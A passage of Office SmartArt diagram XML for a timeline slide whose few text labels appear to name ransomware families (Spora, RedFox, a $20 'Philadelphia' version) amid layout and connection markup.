        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41871AC7-CE38-4D23-B458-7DC79C59C1A9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0" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>RedFox</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEC0AC23-51D2-48B6-889F-D2357988FA84}" type="parTrans" cxnId="{D86C238F-E75F-40D1-B689-223192F8CE61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF0FD307-E79E-48CE-B1ED-7C419767627B}" type="sibTrans" cxnId="{D86C238F-E75F-40D1-B689-223192F8CE61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC518604-BFEA-42C1-BC95-627357BC1FBF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0" u="sng" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>March</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA21BA4E-BE93-49DF-9451-A2F17B849B88}" type="parTrans" cxnId="{ADAE662A-20DD-4695-A71E-BCAA2C817F24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EF46BBF-DD5A-42AF-8AA8-853CB02735A0}" type="sibTrans" cxnId="{ADAE662A-20DD-4695-A71E-BCAA2C817F24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD609BA3-4451-4066-88D5-96FFF2E1CE7C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0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Earth</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B88D363-B35C-4F93-9A14-DF733FCCEA49}" type="parTrans" cxnId="{4D9320EB-B676-466D-A251-9977519991FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF00C66D-004B-4C47-A409-7142AEF85FDF}" type="sibTrans" cxnId="{4D9320EB-B676-466D-A251-9977519991FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F6BB16D-B284-4E0C-8C1B-DCFC6C92986B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b="0" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Spora</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBFEE60A-B5DE-413D-A17F-5D4905B93A79}" type="parTrans" cxnId="{393BE225-5E9E-4B1C-8551-F76E0483C0C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA13818A-B526-4D0B-912A-7A12A4453D5F}" type="sibTrans" cxnId="{393BE225-5E9E-4B1C-8551-F76E0483C0C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41AF8D76-FBFE-4462-876E-0F3CD109FA02}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6852361" y="2802844"/>
          <a:ext cx="884708" cy="426573"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Philadelphia cheap version $20</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96556400-CCDD-417C-B6A1-BB1A9C5B67C3}" type="parTrans" cxnId="{C5437BD9-5150-4173-BF37-0B0291DB31DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD87A16F-F27D-4AE9-A3C1-1E402A4335FE}" type="sibTrans" cxnId="{C5437BD9-5150-4173-BF37-0B0291DB31DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26FDD54A-E4E3-4B15-94AB-53E21F48CA66}" type="pres">
      <dgm:prSet presAssocID="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC092206-83D1-4EBA-AFA6-F6930651E85B}" type="pres">
      <dgm:prSet presAssocID="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" type="pres">
      <dgm:prSet presAssocID="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" presName="points" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6D52F5F-47F1-44D5-8A72-9FAC62D3FDB9}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="compositeA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="textA" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A9D357B-1B9E-40B0-BDB8-8F1F4FA05F7A}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="circleA" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F482BF16-B5CF-466A-BA58-45E6C5357119}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="spaceA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8675D657-FD81-40F2-A5AC-7DB7535AABD7}" type="pres">
      <dgm:prSet presAssocID="{C8B63689-AE32-480F-B66B-8481F7137AF6}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60DE197F-F80E-478E-BE3F-A7B7EA1CE16A}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="compositeB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="textB" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F9E4FCA1-8B2D-4A79-8E4F-70A79EB6B749}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="circleB" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA870473-4B63-418F-9D1A-30150167CDAE}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="spaceB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E34B34B-E52E-48ED-ABB6-DCE8C8AA0C03}" type="pres">
      <dgm:prSet presAssocID="{E03609D5-4748-4E3C-8F59-7CA6A6BDD666}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B95EEF1D-0D23-47F6-BE21-F08259AE9C53}" type="pres">
      <dgm:prSet presAssocID="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" presName="compositeA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" type="pres">
      <dgm:prSet presAssocID="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" presName="textA" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5CC960B-CC1A-4620-AFC1-7A165DA2C273}" type="pres">
      <dgm:prSet presAssocID="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" presName="circleA" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B92E18BA-1B3A-4B01-A46E-B08598A57AFB}" type="pres">
      <dgm:prSet presAssocID="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" presName="spaceA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C6845501-6822-4A86-85AA-B391A8B3DF97}" srcId="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" destId="{06E0AD7F-253E-41B7-9DB6-B501E66D0DF5}" srcOrd="0" destOrd="0" parTransId="{AD45FD92-1140-45D1-AE70-119FDCFC0076}" sibTransId="{59872DB6-1476-41AE-BFFD-5C09AF344E3A}"/>
    <dgm:cxn modelId="{686C0703-BF86-4A92-BD27-6F284FC0A540}" type="presOf" srcId="{4167FE8E-DA4D-4C42-8413-54F9484E73B0}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{EE978B03-180B-40C0-BCC5-C8A9BC36DFEC}" srcId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" destId="{40864BE2-C572-4FD6-BE0B-F69DB2AAC87F}" srcOrd="3" destOrd="0" parTransId="{6162F07D-FAB7-4C91-8E23-0AA9241A3906}" sibTransId="{F72A638A-D138-442E-8847-DC4B31909273}"/>
    <dgm:cxn modelId="{4EEEBD06-E5DC-4963-84E2-DD2FE03B2B8C}" type="presOf" srcId="{43F0E182-20E4-4E20-BB27-BB45ED6AD1D6}" destId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{9789270B-F089-4FD3-B7FF-424338F3F7F2}" type="presOf" srcId="{41871AC7-CE38-4D23-B458-7DC79C59C1A9}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="8" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{ED668119-5C54-42FA-8C4D-B3617BE248F0}" type="presOf" srcId="{06E0AD7F-253E-41B7-9DB6-B501E66D0DF5}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{A6A2421B-0204-4599-9E34-7932B4D0614F}" type="presOf" srcId="{EC518604-BFEA-42C1-BC95-627357BC1FBF}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="9" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{1C0C761D-8832-43EB-AD90-C22EC754A73F}" type="presOf" srcId="{52D8B2F3-3865-4204-838E-5B8723AD5B1D}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="6" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{393BE225-5E9E-4B1C-8551-F76E0483C0C1}" srcId="{EA1701F6-7B57-4B04-9E00-64FC8D153085}" destId="{3F6BB16D-B284-4E0C-8C1B-DCFC6C92986B}" srcOrd="1" destOrd="0" parTransId="{FBFEE60A-B5DE-413D-A17F-5D4905B93A79}" sibTransId="{FA13818A-B526-4D0B-912A-7A12A4453D5F}"/>
    <dgm:cxn modelId="{6D2F4227-BE2B-483D-A01D-E15B5C1E4A19}" srcId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" destId="{ABBB877F-D9D2-4849-AAF0-B10552247CE2}" srcOrd="1" destOrd="0" parTransId="{E847AAD9-00C8-4E2C-B3DA-6F09D59422BB}" sibTransId="{3C97C810-C309-450C-87CF-775D100CA8E8}"/>
    <dgm:cxn modelId="{50A6F428-DF71-4B98-A9BC-367F70B505E9}" type="presOf" srcId="{AD609BA3-4451-4066-88D5-96FFF2E1CE7C}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="10" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{ADAE662A-20DD-4695-A71E-BCAA2C817F24}" srcId="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" destId="{EC518604-BFEA-42C1-BC95-627357BC1FBF}" srcOrd="2" destOrd="0" parTransId="{CA21BA4E-BE93-49DF-9451-A2F17B849B88}" sibTransId="{7EF46BBF-DD5A-42AF-8AA8-853CB02735A0}"/>
    <dgm:cxn modelId="{8397EF38-9D37-4ABA-ACD2-88A881A6D2DE}" type="presOf" srcId="{40864BE2-C572-4FD6-BE0B-F69DB2AAC87F}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="7" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{7AFFAF5B-FDFD-4AAF-B203-6F89BF0C2076}" srcId="{52D8B2F3-3865-4204-838E-5B8723AD5B1D}" destId="{E0C89D72-E6BE-4F70-BD4A-82213CA00498}" srcOrd="0" destOrd="0" parTransId="{B10E7D77-3154-4E3A-9E2A-FA4D01DBB262}" sibTransId="{6C4CAA0F-01C5-49D3-B917-32635A2DA0D2}"/>
    <dgm:cxn modelId="{08BC3F5D-9526-4112-A085-B3C3E6BB0C6C}" type="presOf" srcId="{151F3749-5E5E-4037-8A0D-4ECA8B0B3DB8}" destId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{62CADE60-04F3-4388-BFF7-E15904AE7D02}" srcId="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" destId="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" srcOrd="2" destOrd="0" parTransId="{580A8190-AA38-4F15-96AA-E799AD11A2B2}" sibTransId="{1CF90CF2-C044-4C3B-9B77-F4E121E42C84}"/>
    <dgm:cxn modelId="{41860949-F25A-4C41-A8C7-0C1A99A7742B}" srcId="{43F0E182-20E4-4E20-BB27-BB45ED6AD1D6}" destId="{32C128A9-016D-42DD-8F84-7DB6002DB64B}" srcOrd="0" destOrd="0" parTransId="{97F3B9C9-C5AA-43F1-901A-BEB1EF5AD1EA}" sibTransId="{7CD4A0DB-6E40-4D61-9E59-4D6306F6B256}"/>
    <dgm:cxn modelId="{456FE04B-9BC5-496A-B5AD-99151998C8B5}" type="presOf" srcId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{7C5E6E4D-DA5C-4609-97EC-0ABD139C23A3}" type="presOf" srcId="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" destId="{26FDD54A-E4E3-4B15-94AB-53E21F48CA66}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{9564B76E-F6DF-4709-A1EE-986A560F8E5D}" type="presOf" srcId="{E0C89D72-E6BE-4F70-BD4A-82213CA00498}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="7" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{AA493673-DAC7-4571-B247-A7E1C831035C}" srcId="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" destId="{EA1701F6-7B57-4B04-9E00-64FC8D153085}" srcOrd="0" destOrd="0" parTransId="{A6530B81-68FB-4CB6-934B-339EA4E796B5}" sibTransId="{7CDBA56F-B9FD-42B0-9B00-3DC230E39858}"/>
    <dgm:cxn modelId="{515B7C57-0153-4B58-9D82-8C7BF3356598}" srcId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" destId="{1F0207D8-7CAB-4892-B356-7C2A8A213A1D}" srcOrd="2" destOrd="0" parTransId="{3D1B7794-EE81-48B4-9322-7B559F68A8E0}" sibTransId="{ED7A0999-4F27-41A5-B228-1D2EC1D78CAA}"/>
    <dgm:cxn modelId="{B4FEBE7A-2BF7-40FE-B3B9-848E87BAF87B}" srcId="{EA1701F6-7B57-4B04-9E00-64FC8D153085}" destId="{8970DD42-16BF-473B-B9EA-D23F839FB14B}" srcOrd="0" destOrd="0" parTransId="{FC518083-7448-46A4-BA39-0C65D56F2454}" sibTransId="{EAE5CB11-5EF7-41A6-8F0F-95FF005EAD41}"/>
    <dgm:cxn modelId="{8F45DD7A-EBA8-4D45-8D17-4C7638237593}" type="presOf" srcId="{32C128A9-016D-42DD-8F84-7DB6002DB64B}" destId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{D86C238F-E75F-40D1-B689-223192F8CE61}" srcId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" destId="{41871AC7-CE38-4D23-B458-7DC79C59C1A9}" srcOrd="4" destOrd="0" parTransId="{FEC0AC23-51D2-48B6-889F-D2357988FA84}" sibTransId="{BF0FD307-E79E-48CE-B1ED-7C419767627B}"/>
    <dgm:cxn modelId="{9800F993-E79D-4E84-9E4D-6B440DCE6DD8}" srcId="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" destId="{4167FE8E-DA4D-4C42-8413-54F9484E73B0}" srcOrd="1" destOrd="0" parTransId="{9F2FB77C-3145-4835-BBBA-2FF78280D34A}" sibTransId="{803EC87C-477D-4009-8FF0-26D2C4E408B5}"/>
    <dgm:cxn modelId="{111E4595-DC13-4AD0-9D6B-307D6DE6BF34}" srcId="{06E0AD7F-253E-41B7-9DB6-B501E66D0DF5}" destId="{E18FEC7A-D632-4985-BE41-47A231EDBCAB}" srcOrd="0" destOrd="0" parTransId="{37B460B8-47B3-459E-A072-D87BFDEB0BE8}" sibTransId="{83E871AF-511B-4CDE-AFB5-8A29054B333A}"/>
    <dgm:cxn modelId="{C8EECF99-0351-4257-86AF-3C999E8D4CA7}" srcId="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" destId="{43F0E182-20E4-4E20-BB27-BB45ED6AD1D6}" srcOrd="1" destOrd="0" parTransId="{4EFBB008-E0FD-4055-808C-CEE53D875550}" sibTransId="{6A84729A-F474-41AA-92D2-39975C154C88}"/>
    <dgm:cxn modelId="{F2EC819B-3F97-4BED-9874-0743B408A9B1}" srcId="{4167FE8E-DA4D-4C42-8413-54F9484E73B0}" destId="{52D8B2F3-3865-4204-838E-5B8723AD5B1D}" srcOrd="0" destOrd="0" parTransId="{F66BB769-5EA5-4050-8424-85221DFB27C6}" sibTransId="{E0EB1011-8A11-4A4E-93CF-8077611D9BAD}"/>
    <dgm:cxn modelId="{4A089AA1-69A6-4213-A99C-FA57141EDE2B}" srcId="{151F3749-5E5E-4037-8A0D-4ECA8B0B3DB8}" destId="{F174FEBA-606B-4758-B93F-F2CE28432A04}" srcOrd="0" destOrd="0" parTransId="{3F2CBC27-B31C-43BE-9905-5E53C4C2C18F}" sibTransId="{1BA6908C-292D-4F6F-9E6F-94B1F1E8F88C}"/>
    <dgm:cxn modelId="{433116A9-3250-4557-96F7-7FD9A387A4AC}" type="presOf" srcId="{41AF8D76-FBFE-4462-876E-0F3CD109FA02}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{2E277EAA-4A25-482D-B466-FF2129BF670C}" type="presOf" srcId="{8970DD42-16BF-473B-B9EA-D23F839FB14B}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{C667D2B1-FA13-4F8F-8E53-91653C26C969}" srcId="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" destId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" srcOrd="1" destOrd="0" parTransId="{6BB94DCE-8A0F-4BD9-926C-B5292145B277}" sibTransId="{0D949C87-CDEB-4FF7-BC8C-11E55F296888}"/>
    <dgm:cxn modelId="{27F264B2-C8B3-4B48-853A-3EBCEE58E7DE}" type="presOf" srcId="{3F6BB16D-B284-4E0C-8C1B-DCFC6C92986B}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{889433B9-0350-4129-90B9-59F479E57974}" type="presOf" srcId="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{3ED79CBF-8F8F-4432-BA1D-0B7E500092F4}" type="presOf" srcId="{E18FEC7A-D632-4985-BE41-47A231EDBCAB}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{5ED8A2C3-FBF5-45CF-B250-55DCA270924D}" type="presOf" srcId="{6C104186-A88F-4F95-8FE2-4190E4FC7719}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{4F78F2C3-1B0A-405C-A2B8-C872DA240208}" type="presOf" srcId="{ABBB877F-D9D2-4849-AAF0-B10552247CE2}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{515955CF-8517-4484-860B-4F20D9E9A79C}" type="presOf" srcId="{F174FEBA-606B-4758-B93F-F2CE28432A04}" destId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{B5D61FD0-EA62-4C06-8172-2BB441F533E2}" type="presOf" srcId="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{5B36FBD1-1FB9-4528-BBF8-86579C4626A5}" type="presOf" srcId="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" destId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{A81889D7-B4F1-469E-A91B-D36894BED34C}" srcId="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" destId="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" srcOrd="1" destOrd="0" parTransId="{B45DE71B-8C61-4A29-BBB0-5AA953CF7542}" sibTransId="{E03609D5-4748-4E3C-8F59-7CA6A6BDD666}"/>
    <dgm:cxn modelId="{C5437BD9-5150-4173-BF37-0B0291DB31DD}" srcId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5}" destId="{41AF8D76-FBFE-4462-876E-0F3CD109FA02}" srcOrd="0" destOrd="0" parTransId="{96556400-CCDD-417C-B6A1-BB1A9C5B67C3}" sibTransId="{AD87A16F-F27D-4AE9-A3C1-1E402A4335FE}"/>
    <dgm:cxn modelId="{CEBC12DF-B1B9-4AFA-9406-F53DF9C9C3C8}" srcId="{EA1701F6-7B57-4B04-9E00-64FC8D153085}" destId="{6C104186-A88F-4F95-8FE2-4190E4FC7719}" srcOrd="2" destOrd="0" parTransId="{6085A540-300A-4A10-BE6E-55FAEB54CBAC}" sibTransId="{A2397C22-272F-467A-B891-2329DD34EF38}"/>
    <dgm:cxn modelId="{3F696DDF-D5B1-482C-80B5-C8E18D3FD5D1}" type="presOf" srcId="{EA1701F6-7B57-4B04-9E00-64FC8D153085}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{990DAEE3-EFD2-4457-8CBF-CE6416191759}" srcId="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" destId="{151F3749-5E5E-4037-8A0D-4ECA8B0B3DB8}" srcOrd="0" destOrd="0" parTransId="{C6707691-7632-4CCE-8B55-C6009746508C}" sibTransId="{4209C33B-949E-4774-988D-8FC100525F9D}"/>
    <dgm:cxn modelId="{0BFFA8E7-B3C6-456E-8198-4E9C42E82C41}" type="presOf" srcId="{1F0207D8-7CAB-4892-B356-7C2A8A213A1D}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="6" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{270815E9-4A88-4DB4-9040-920BB982ABD8}" srcId="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" destId="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" srcOrd="0" destOrd="0" parTransId="{180ECF10-61BF-4891-A06A-93E397C04263}" sibTransId="{C8B63689-AE32-480F-B66B-8481F7137AF6}"/>
